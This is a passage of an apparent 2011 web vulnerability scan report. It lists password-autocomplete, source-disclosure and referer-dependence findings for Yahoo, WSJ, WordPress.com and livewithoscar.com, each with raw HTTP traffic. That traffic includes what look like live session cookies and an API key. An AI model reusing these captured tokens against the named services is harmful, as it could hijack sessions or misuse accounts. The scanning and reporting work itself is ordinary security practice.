Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D; ref=bottomtext

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:48 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Vary: Accept-Encoding
Content-Length: 28577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="
...[SNIP]...
<div id="adminbar">
   <form name="loginform" class="login-form" id="adminbarlogin" action="https://en.wordpress.com/wp-login.php" method="post">
   <label class="login userlogin-label" id="userlogin_label">
...[SNIP]...
</span><input class="adminbar-input user-pass-input" type="password" name="pwd" id="user_pass" value="" tabindex="2" /></label>
...[SNIP]...
13.11. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>


</div>
...[SNIP]...
13.12. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...
</div>            
           <form action="servlet/login" method="post" id="loginForm" name="loginForm"

onsubmit="checkJS()">

<div class="field" style="padding-top: 10px;">
...[SNIP]...
</label><input type="password" name="p" value="" size="20"

maxlength="32" id="pwd"/>
</div>
...[SNIP]...
13.13. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...
13.14. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...
13.15. http://wordpress.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wordpress.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: wordpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 14 Jun 2011 00:28:37 +0000
Cache-Control: max-age=188, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://wordpress.com/xmlrpc.php
Link: <http://wp.me/1>; rel=shortlink
X-nananana: Batcache
Content-Length: 36027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><!--
   generated
...[SNIP]...
<div id="adminbar">
   <form name="loginform" class="login-form" id="adminbarlogin" action="https://en.wordpress.com/wp-login.php" method="post">
   <label class="login userlogin-label" id="userlogin_label">
...[SNIP]...
</span><input class="adminbar-input user-pass-input" type="password" name="pwd" id="user_pass" value="" tabindex="2" /></label>
...[SNIP]...
13.16. http://www.livewithoscar.com/Calendar.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Calendar.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Calendar.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:56 GMT
Content-Length: 20681

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Calendar.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
13.17. http://www.livewithoscar.com/Chat.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Chat.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Chat.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.8.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 20808

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Chat.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
13.18. http://www.livewithoscar.com/DailyOmni.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /DailyOmni.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /DailyOmni.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.2.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:23 GMT
Content-Length: 44997

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts ar
...[SNIP]...
</script>
<form name="form2" method="post" action="DailyOmni.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
13.19. http://www.livewithoscar.com/FlashIframe.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /FlashIframe.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /FlashIframe.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.1.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:07 GMT
Content-Length: 13776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta id="RefreshPer
...[SNIP]...
</script>
<form name="form2" method="post" action="FlashIframe.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
14. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.livewithoscar.com
Path:   /CuteSoft_Client/CuteEditor/Load.ashx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /CuteSoft_Client/CuteEditor/Load.ashx?type=scripts&file=Gecko_Implementation&modified=20110519163030 HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Last-Modified: Thu, 19 May 2011 20:30:30 GMT
Server: Microsoft-IIS/7.0
content-disposition: filename=Gecko_Implementation.js
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:31 GMT
Content-Length: 265945

//2010-07-16 16:12:45

var OxO8152=["//TODO: event not found? throw error ?","ua","userAgent","isOpera","opera","isSafari","safari","isGecko","gecko","isWinIE","msie","isMac","Mac","isNetscape","Net
...[SNIP]...
<style[\s\S]*?\/style>/gi;var Ox790=/&#[\d]*?;/gi;var Ox791=/<%[\s\S]*?%>/g;var Ox792=/(<asp:[^\>
...[SNIP]...
15. Referer-dependent response  previous  next
There are 8 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Request 1

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:13:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
